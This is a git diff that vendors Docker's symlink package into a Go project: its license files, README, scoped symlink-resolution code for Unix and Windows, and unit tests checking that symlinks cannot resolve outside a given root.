+ if !test { + t.Fatalf("Expected string t🐳st to be in slice") + } + test = InSlice(slice, "SLICE") + if !test { + t.Fatalf("Expected string SLICE to be in slice") + } + test = InSlice(slice, "notinslice") + if test { + t.Fatalf("Expected string notinslice not to be in slice") + } +} + +func TestShellQuoteArgumentsEmpty(t *testing.T) { + actual := ShellQuoteArguments([]string{}) + expected := "" + if actual != expected { + t.Fatalf("Expected an empty string") + } +} + +func TestShellQuoteArguments(t *testing.T) { + simpleString := "simpleString" + complexString := "This is a 'more' complex $tring with some special char *" + actual := ShellQuoteArguments([]string{simpleString, complexString}) + expected := "simpleString 'This is a '\\''more'\\'' complex $tring with some special char *'" + if actual != expected { 
+ t.Fatalf("Expected \"%v\", got \"%v\"", expected, actual) + } +} diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE new file mode 100644 index 0000000000..34c4ea7c50 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE @@ -0,0 +1,191 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. 
+ + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. 
Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. 
You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. 
+ + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. 
In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + Copyright 2014-2016 Docker, Inc. + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. 
diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD new file mode 100644 index 0000000000..9b4f4a294e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD @@ -0,0 +1,27 @@ +Copyright (c) 2014-2016 The Docker & Go Authors. All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
diff --git a/vendor/github.com/docker/docker/pkg/symlink/README.md b/vendor/github.com/docker/docker/pkg/symlink/README.md new file mode 100644 index 0000000000..8dba54fd08 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/README.md @@ -0,0 +1,6 @@ +Package symlink implements EvalSymlinksInScope which is an extension of filepath.EvalSymlinks, +as well as a Windows long-path aware version of filepath.EvalSymlinks +from the [Go standard library](https://golang.org/pkg/path/filepath). + +The code from filepath.EvalSymlinks has been adapted in fs.go. +Please read the LICENSE.BSD file that governs fs.go and LICENSE.APACHE for fs_test.go. diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs.go b/vendor/github.com/docker/docker/pkg/symlink/fs.go new file mode 100644 index 0000000000..f6bc2231f6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/fs.go @@ -0,0 +1,144 @@ +// Copyright 2012 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE.BSD file. + +// This code is a modified version of path/filepath/symlink.go from the Go standard library. + +package symlink + +import ( + "bytes" + "errors" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/system" +) + +// FollowSymlinkInScope is a wrapper around evalSymlinksInScope that returns an +// absolute path. This function handles paths in a platform-agnostic manner. +func FollowSymlinkInScope(path, root string) (string, error) { + path, err := filepath.Abs(filepath.FromSlash(path)) + if err != nil { + return "", err + } + root, err = filepath.Abs(filepath.FromSlash(root)) + if err != nil { + return "", err + } + return evalSymlinksInScope(path, root) +} + +// evalSymlinksInScope will evaluate symlinks in `path` within a scope `root` and return +// a result guaranteed to be contained within the scope `root`, at the time of the call. +// Symlinks in `root` are not evaluated and left as-is. 
+// Errors encountered while attempting to evaluate symlinks in path will be returned. +// Non-existing paths are valid and do not constitute an error. +// `path` has to contain `root` as a prefix, or else an error will be returned. +// Trying to break out from `root` does not constitute an error. +// +// Example: +// If /foo/bar -> /outside, +// FollowSymlinkInScope("/foo/bar", "/foo") == "/foo/outside" instead of "/oustide" +// +// IMPORTANT: it is the caller's responsibility to call evalSymlinksInScope *after* relevant symlinks +// are created and not to create subsequently, additional symlinks that could potentially make a +// previously-safe path, unsafe. Example: if /foo/bar does not exist, evalSymlinksInScope("/foo/bar", "/foo") +// would return "/foo/bar". If one makes /foo/bar a symlink to /baz subsequently, then "/foo/bar" should +// no longer be considered safely contained in "/foo". +func evalSymlinksInScope(path, root string) (string, error) { + root = filepath.Clean(root) + if path == root { + return path, nil + } + if !strings.HasPrefix(path, root) { + return "", errors.New("evalSymlinksInScope: " + path + " is not in " + root) + } + const maxIter = 255 + originalPath := path + // given root of "/a" and path of "/a/b/../../c" we want path to be "/b/../../c" + path = path[len(root):] + if root == string(filepath.Separator) { + path = string(filepath.Separator) + path + } + if !strings.HasPrefix(path, string(filepath.Separator)) { + return "", errors.New("evalSymlinksInScope: " + path + " is not in " + root) + } + path = filepath.Clean(path) + // consume path by taking each frontmost path element, + // expanding it if it's a symlink, and appending it to b + var b bytes.Buffer + // b here will always be considered to be the "current absolute path inside + // root" when we append paths to it, we also append a slash and use + // filepath.Clean after the loop to trim the trailing slash + for n := 0; path != ""; n++ { + if n > maxIter { + return "", 
errors.New("evalSymlinksInScope: too many links in " + originalPath) + } + + // find next path component, p + i := strings.IndexRune(path, filepath.Separator) + var p string + if i == -1 { + p, path = path, "" + } else { + p, path = path[:i], path[i+1:] + } + + if p == "" { + continue + } + + // this takes a b.String() like "b/../" and a p like "c" and turns it + // into "/b/../c" which then gets filepath.Cleaned into "/c" and then + // root gets prepended and we Clean again (to remove any trailing slash + // if the first Clean gave us just "/") + cleanP := filepath.Clean(string(filepath.Separator) + b.String() + p) + if isDriveOrRoot(cleanP) { + // never Lstat "/" itself, or drive letters on Windows + b.Reset() + continue + } + fullP := filepath.Clean(root + cleanP) + + fi, err := os.Lstat(fullP) + if os.IsNotExist(err) { + // if p does not exist, accept it + b.WriteString(p) + b.WriteRune(filepath.Separator) + continue + } + if err != nil { + return "", err + } + if fi.Mode()&os.ModeSymlink == 0 { + b.WriteString(p) + b.WriteRune(filepath.Separator) + continue + } + + // it's a symlink, put it at the front of path + dest, err := os.Readlink(fullP) + if err != nil { + return "", err + } + if system.IsAbs(dest) { + b.Reset() + } + path = dest + string(filepath.Separator) + path + } + + // see note above on "fullP := ..." for why this is double-cleaned and + // what's happening here + return filepath.Clean(root + filepath.Clean(string(filepath.Separator)+b.String())), nil +} + +// EvalSymlinks returns the path name after the evaluation of any symbolic +// links. +// If path is relative the result will be relative to the current directory, +// unless one of the components is an absolute symbolic link. +// This version has been updated to support long paths prepended with `\\?\`. 
+func EvalSymlinks(path string) (string, error) { + return evalSymlinks(path) +} diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go new file mode 100644 index 0000000000..22708273d6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go @@ -0,0 +1,15 @@ +// +build !windows + +package symlink + +import ( + "path/filepath" +) + +func evalSymlinks(path string) (string, error) { + return filepath.EvalSymlinks(path) +} + +func isDriveOrRoot(p string) bool { + return p == string(filepath.Separator) +} diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go new file mode 100644 index 0000000000..7085c0b666 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go @@ -0,0 +1,407 @@ +// +build !windows + +// Licensed under the Apache License, Version 2.0; See LICENSE.APACHE + +package symlink + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +// TODO Windows: This needs some serious work to port to Windows. For now, +// turning off testing in this package. 
+ +type dirOrLink struct { + path string + target string +} + +func makeFs(tmpdir string, fs []dirOrLink) error { + for _, s := range fs { + s.path = filepath.Join(tmpdir, s.path) + if s.target == "" { + os.MkdirAll(s.path, 0755) + continue + } + if err := os.MkdirAll(filepath.Dir(s.path), 0755); err != nil { + return err + } + if err := os.Symlink(s.target, s.path); err != nil && !os.IsExist(err) { + return err + } + } + return nil +} + +func testSymlink(tmpdir, path, expected, scope string) error { + rewrite, err := FollowSymlinkInScope(filepath.Join(tmpdir, path), filepath.Join(tmpdir, scope)) + if err != nil { + return err + } + expected, err = filepath.Abs(filepath.Join(tmpdir, expected)) + if err != nil { + return err + } + if expected != rewrite { + return fmt.Errorf("Expected %q got %q", expected, rewrite) + } + return nil +} + +func TestFollowSymlinkAbsolute(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkAbsolute") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/d", target: "/b"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/a/d/c/data", "testdata/b/c/data", "testdata"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkRelativePath(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativePath") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/i", target: "a"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/i", "testdata/fs/a", "testdata"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkSkipSymlinksOutsideScope(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkSkipSymlinksOutsideScope") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := makeFs(tmpdir, []dirOrLink{ + {path: "linkdir", target: "realdir"}, + {path: 
"linkdir/foo/bar"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "linkdir/foo/bar", "linkdir/foo/bar", "linkdir/foo"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkInvalidScopePathPair(t *testing.T) { + if _, err := FollowSymlinkInScope("toto", "testdata"); err == nil { + t.Fatal("expected an error") + } +} + +func TestFollowSymlinkLastLink(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkLastLink") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/d", target: "/b"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/a/d", "testdata/b", "testdata"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkRelativeLinkChangeScope(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativeLinkChangeScope") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/e", target: "../b"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/a/e/c/data", "testdata/fs/b/c/data", "testdata"); err != nil { + t.Fatal(err) + } + // avoid letting allowing symlink e lead us to ../b + // normalize to the "testdata/fs/a" + if err := testSymlink(tmpdir, "testdata/fs/a/e", "testdata/fs/a/b", "testdata/fs/a"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkDeepRelativeLinkChangeScope(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkDeepRelativeLinkChangeScope") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/a/f", target: "../../../../test"}}); err != nil { + t.Fatal(err) + } + // avoid letting symlink f lead us out of the "testdata" scope + // we don't normalize because symlink f is in scope and there is no + // information leak + if err := testSymlink(tmpdir, "testdata/fs/a/f", "testdata/test", 
"testdata"); err != nil { + t.Fatal(err) + } + // avoid letting symlink f lead us out of the "testdata/fs" scope + // we don't normalize because symlink f is in scope and there is no + // information leak + if err := testSymlink(tmpdir, "testdata/fs/a/f", "testdata/fs/test", "testdata/fs"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkRelativeLinkChain(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativeLinkChain") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + // avoid letting symlink g (pointed at by symlink h) take out of scope + // TODO: we should probably normalize to scope here because ../[....]/root + // is out of scope and we leak information + if err := makeFs(tmpdir, []dirOrLink{ + {path: "testdata/fs/b/h", target: "../g"}, + {path: "testdata/fs/g", target: "../../../../../../../../../../../../root"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/b/h", "testdata/root", "testdata"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkBreakoutPath(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkBreakoutPath") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + // avoid letting symlink -> ../directory/file escape from scope + // normalize to "testdata/fs/j" + if err := makeFs(tmpdir, []dirOrLink{{path: "testdata/fs/j/k", target: "../i/a"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "testdata/fs/j/k", "testdata/fs/j/i/a", "testdata/fs/j"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkToRoot(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkToRoot") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + // make sure we don't allow escaping to / + // normalize to dir + if err := makeFs(tmpdir, []dirOrLink{{path: "foo", target: "/"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "foo", "", ""); err != nil { + t.Fatal(err) + 
} +} + +func TestFollowSymlinkSlashDotdot(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkSlashDotdot") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + tmpdir = filepath.Join(tmpdir, "dir", "subdir") + + // make sure we don't allow escaping to / + // normalize to dir + if err := makeFs(tmpdir, []dirOrLink{{path: "foo", target: "/../../"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "foo", "", ""); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkDotdot(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkDotdot") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + tmpdir = filepath.Join(tmpdir, "dir", "subdir") + + // make sure we stay in scope without leaking information + // this also checks for escaping to / + // normalize to dir + if err := makeFs(tmpdir, []dirOrLink{{path: "foo", target: "../../"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "foo", "", ""); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkRelativePath2(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkRelativePath2") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{{path: "bar/foo", target: "baz/target"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "bar/foo", "bar/baz/target", ""); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkScopeLink(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkScopeLink") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{ + {path: "root2"}, + {path: "root", target: "root2"}, + {path: "root2/foo", target: "../bar"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "root/foo", "root/bar", "root"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkRootScope(t *testing.T) { + tmpdir, err := ioutil.TempDir("", 
"TestFollowSymlinkRootScope") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + expected, err := filepath.EvalSymlinks(tmpdir) + if err != nil { + t.Fatal(err) + } + rewrite, err := FollowSymlinkInScope(tmpdir, "/") + if err != nil { + t.Fatal(err) + } + if rewrite != expected { + t.Fatalf("expected %q got %q", expected, rewrite) + } +} + +func TestFollowSymlinkEmpty(t *testing.T) { + res, err := FollowSymlinkInScope("", "") + if err != nil { + t.Fatal(err) + } + wd, err := os.Getwd() + if err != nil { + t.Fatal(err) + } + if res != wd { + t.Fatalf("expected %q got %q", wd, res) + } +} + +func TestFollowSymlinkCircular(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkCircular") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{{path: "root/foo", target: "foo"}}); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "root/foo", "", "root"); err == nil { + t.Fatal("expected an error for foo -> foo") + } + + if err := makeFs(tmpdir, []dirOrLink{ + {path: "root/bar", target: "baz"}, + {path: "root/baz", target: "../bak"}, + {path: "root/bak", target: "/bar"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "root/foo", "", "root"); err == nil { + t.Fatal("expected an error for bar -> baz -> bak -> bar") + } +} + +func TestFollowSymlinkComplexChainWithTargetPathsContainingLinks(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkComplexChainWithTargetPathsContainingLinks") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{ + {path: "root2"}, + {path: "root", target: "root2"}, + {path: "root/a", target: "r/s"}, + {path: "root/r", target: "../root/t"}, + {path: "root/root/t/s/b", target: "/../u"}, + {path: "root/u/c", target: "."}, + {path: "root/u/x/y", target: "../v"}, + {path: "root/u/v", target: "/../w"}, + }); err != nil { + t.Fatal(err) + } + if err := 
testSymlink(tmpdir, "root/a/b/c/x/y/z", "root/w/z", "root"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkBreakoutNonExistent(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkBreakoutNonExistent") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{ + {path: "root/slash", target: "/"}, + {path: "root/sym", target: "/idontexist/../slash"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "root/sym/file", "root/file", "root"); err != nil { + t.Fatal(err) + } +} + +func TestFollowSymlinkNoLexicalCleaning(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestFollowSymlinkNoLexicalCleaning") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + if err := makeFs(tmpdir, []dirOrLink{ + {path: "root/sym", target: "/foo/bar"}, + {path: "root/hello", target: "/sym/../baz"}, + }); err != nil { + t.Fatal(err) + } + if err := testSymlink(tmpdir, "root/hello", "root/foo/baz", "root"); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go new file mode 100644 index 0000000000..241e531f9d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go @@ -0,0 +1,169 @@ +package symlink + +import ( + "bytes" + "errors" + "os" + "path/filepath" + "strings" + "syscall" + + "github.com/docker/docker/pkg/longpath" +) + +func toShort(path string) (string, error) { + p, err := syscall.UTF16FromString(path) + if err != nil { + return "", err + } + b := p // GetShortPathName says we can reuse buffer + n, err := syscall.GetShortPathName(&p[0], &b[0], uint32(len(b))) + if err != nil { + return "", err + } + if n > uint32(len(b)) { + b = make([]uint16, n) + if _, err = syscall.GetShortPathName(&p[0], &b[0], uint32(len(b))); err != nil { + return "", err + } + } + return syscall.UTF16ToString(b), nil +} + +func toLong(path string) (string, 
error) { + p, err := syscall.UTF16FromString(path) + if err != nil { + return "", err + } + b := p // GetLongPathName says we can reuse buffer + n, err := syscall.GetLongPathName(&p[0], &b[0], uint32(len(b))) + if err != nil { + return "", err + } + if n > uint32(len(b)) { + b = make([]uint16, n) + n, err = syscall.GetLongPathName(&p[0], &b[0], uint32(len(b))) + if err != nil { + return "", err + } + } + b = b[:n] + return syscall.UTF16ToString(b), nil +} + +func evalSymlinks(path string) (string, error) { + path, err := walkSymlinks(path) + if err != nil { + return "", err + } + + p, err := toShort(path) + if err != nil { + return "", err + } + p, err = toLong(p) + if err != nil { + return "", err + } + // syscall.GetLongPathName does not change the case of the drive letter, + // but the result of EvalSymlinks must be unique, so we have + // EvalSymlinks(`c:\a`) == EvalSymlinks(`C:\a`). + // Make drive letter upper case. + if len(p) >= 2 && p[1] == ':' && 'a' <= p[0] && p[0] <= 'z' { + p = string(p[0]+'A'-'a') + p[1:] + } else if len(p) >= 6 && p[5] == ':' && 'a' <= p[4] && p[4] <= 'z' { + p = p[:3] + string(p[4]+'A'-'a') + p[5:] + } + return filepath.Clean(p), nil +} + +const utf8RuneSelf = 0x80 + +func walkSymlinks(path string) (string, error) { + const maxIter = 255 + originalPath := path + // consume path by taking each frontmost path element, + // expanding it if it's a symlink, and appending it to b + var b bytes.Buffer + for n := 0; path != ""; n++ { + if n > maxIter { + return "", errors.New("EvalSymlinks: too many links in " + originalPath) + } + + // A path beginning with `\\?\` represents the root, so automatically + // skip that part and begin processing the next segment. 
+ if strings.HasPrefix(path, longpath.Prefix) { + b.WriteString(longpath.Prefix) + path = path[4:] + continue + } + + // find next path component, p + var i = -1 + for j, c := range path { + if c < utf8RuneSelf && os.IsPathSeparator(uint8(c)) { + i = j + break + } + } + var p string + if i == -1 { + p, path = path, "" + } else { + p, path = path[:i], path[i+1:] + } + + if p == "" { + if b.Len() == 0 { + // must be absolute path + b.WriteRune(filepath.Separator) + } + continue + } + + // If this is the first segment after the long path prefix, accept the + // current segment as a volume root or UNC share and move on to the next. + if b.String() == longpath.Prefix { + b.WriteString(p) + b.WriteRune(filepath.Separator) + continue + } + + fi, err := os.Lstat(b.String() + p) + if err != nil { + return "", err + } + if fi.Mode()&os.ModeSymlink == 0 { + b.WriteString(p) + if path != "" || (b.Len() == 2 && len(p) == 2 && p[1] == ':') { + b.WriteRune(filepath.Separator) + } + continue + } + + // it's a symlink, put it at the front of path + dest, err := os.Readlink(b.String() + p) + if err != nil { + return "", err + } + if filepath.IsAbs(dest) || os.IsPathSeparator(dest[0]) { + b.Reset() + } + path = dest + string(filepath.Separator) + path + } + return filepath.Clean(b.String()), nil +} + +func 